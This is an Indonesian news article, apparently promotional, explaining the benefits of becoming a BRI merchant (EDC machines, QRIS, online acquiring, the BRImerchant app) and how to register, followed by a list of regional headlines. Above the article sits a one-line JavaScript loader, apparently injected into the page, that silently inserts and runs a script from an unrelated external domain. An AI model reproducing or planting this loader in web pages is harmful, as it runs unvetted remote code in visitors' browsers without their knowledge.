(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Lifestyle

Jadi Merchant BRI Bisa Bikin Usaha Makin Moncer, Begini Cara Daftarnya


KANALKALIMANTAN.COM – Penyediaan pilihan metode pembayaran nontunai, seperti mesin electronic data capture (EDC) dan Quick Response Indonesia Standard (QRIS), seakan sudah menjadi kewajiban setiap merchant.

Pasalnya, dari tahun ke tahun, konsumen sudah terbiasa bertransaksi secara nontunai. Data terbaru dari Bank Indonesia (BI), misalnya, mengungkapkan bahwa sistem pembayaran QRIS tumbuh sebesar 175,44 persen secara year-on-year (yoy) pada April 2024.

Jumlah pengguna QRIS dari sektor konsumen mencapai 48,12 juta orang. Sementara jumlah merchant yang menggunakan QRIS mencapai 31,61 juta yang sebagian besar adalah merchant usaha mikro kecil dan menengah (UMKM).

Dalam riset bertajuk Visa Consumer Payment Attitudes 2023, sebanyak 74 persen pelaku usaha yang menyediakan sistem pembayaran digital mengalami peningkatan omzet secara signifikan. Peningkatan terjadi lantaran konsumen dimudahkan dalam menyelesaikan transaksi.

Baca juga: Aeris Hotel Banjarbaru Diberi SP 1, SLF dan Andalalin Belum Lengkap

Jika belum memiliki metode pembayaran itu, sebagai pemilik usaha, Anda perlu segera menyediakannya. Apalagi, penyediaan pilihan metode pembayaran nontunai sekarang semakin mudah. Salah satu caranya adalah dengan menjadi Merchant BRI.

 

Manfaat jadi Merchant BRI

Dengan menjadi Merchant BRI, pengusaha akan mendapatkan sejumlah manfaat. Pertama, kemudahan transaksi untuk konsumen. BRI akan menyediakan berbagai fasilitas pembayaran sesuai kebutuhan merchant agar aktivitas transaksi dengan konsumen menjadi lebih mudah.

Fasilitas tersebut terdiri dari EDC + QRIS Dinamis BRI, QRIS Statis, serta Online Acquiring BRI. Mesin EDC dapat digunakan untuk menerima transaksi pembayaran dengan menggunakan kartu debit, kartu kredit, kartu prepaid seperti BRIZZI, serta QRIS.

Mesin EDC BRI bisa mengeluarkan kode QRIS dinamis. Dengan QRIS dinamis, pembeli hanya perlu memindai kode QR dari mesin EDC. Sebab, nominal transaksi yang harus dibayar sudah otomatis masuk saat hendak menyelesaikan pembayaran.

Baca juga: Empat DPC Ikadin di Kalsel 2023-2026 Dilantik

Untuk QRIS statis, kode ini akan diberikan BRI dan bisa dipajang atau ditempel di tempat usaha merchant. Pembeli pun tinggal memindai kode tersebut serta memasukkan nominal dan PIN untuk menyelesaikan transaksi.

Sementara itu, Online Acquiring BRI merupakan salah satu metode akseptasi transaksi secara online menggunakan nomor kartu debit dan kartu kredit (card not present), baik dari BRI maupun bank lain, yang berlogo Visa, Mastercard, JCB, atau GPN, dengan lebih mudah, cepat dan terjaga keamanannya.

Kedua, meningkatkan daya saing dan produktivitas. Dengan menjadi Merchant BRI, pengusaha tentu dapat meningkatkan daya saing dan produktivitasnya karena telah menyediakan berbagai jenis metode pembayaran.

Ketiga, merchant dapat mengelola keuangan secara lebih baik. Sebab, setiap transaksi nontunai yang dilakukan langsung tercatat pada aplikasi BRImerchant yang dapat diunduh melalui Play Store dan App Store.

Tak hanya itu, pada aplikasi tersebut, merchant juga bisa melihat riwayat transaksi dan mengunduh laporannya, mulai dari harian hingga maksimal 1 bulan.

Baca juga: Andoko Abdi Lamar Partai Sendiri, Putusan Pasangan Ada di DPP

Keempat, BRI menyediakan Tabungan BRI BritAma Bisnis untuk memisahkan transaksi pribadi dan bisnis terpisah. Dengan demikian, dana operasional usaha tidak tercampur.

Jika tertarik bergabung sebagai Merchant BRI, Anda bisa melakukan pendaftaran melalui aplikasi BRImo atau mengunjungi tautan berikut.

Jadi tunggu apalagi, segera gabung jadi merchant BRI dan rasakan kemudahan monitoring usaha Anda! (Kanalkalimantan.com)

Editor: kk


Risa

Recent Posts

Tinggalkan Plastik, Bakul Purun Jadi Wadah Daging Kurban di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Penyelenggaraan ibadah kurban Iduladha 1445 Hijriah di Banjarbaru menerapkan sistem ramah lingkungan.… Read More

42 menit ago

Panitia Kurban Masjid Hajjah Nuriah Banjarbaru Sembelih 14 Ekor Sapi

KANALKALIMANTAN.COM, BANJARBARU - Momen ibadah kurban Iduladha 1445 hijriah menjadi ajang silaturahim dan gotong royong… Read More

3 jam ago

Jemaah Haji Asal Tabalong Wafat Jelang Wukuf Arafah

KANALKALIMANTAN.COM, BANJARMASIN - Kabar duka datang dari Kloter 18 Haji Embarkasi Banjarmasin, seorang jemaah haji… Read More

20 jam ago

Harga Daging Sapi Stabil di Pasar Bauntung Banjarbaru, Ayam Ras Naik Capai Rp31 Ribu per Kg

KANALKALIMANTAN.COM, BANJARBARU - Lapak penjual daging sapi di Pasar Bauntung Kota Banjarbaru Kalimantan Selatan (Kalsel)… Read More

24 jam ago

Kerukunan Mahasiswa HSU Banjarmasin Dikukuhkan, Ini Pesan Ketua DPRD HSU

KANALKALIMANTAN.COM, AMUNTAI - Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Hulu Sungai Utara (HSU) selalu memberikan… Read More

1 hari ago

203 Jemaah Sidrap Ditangkap di Jeddah, Pakai Visa Ziarah Bertahan untuk Berhaji

KANALKALIMANTAN.COM, JEDDAH - Tim Pengawas (Timwas) Haji DPR meminta jemaah calon haji Indonesia yang tidak… Read More

1 hari ago

This website uses cookies.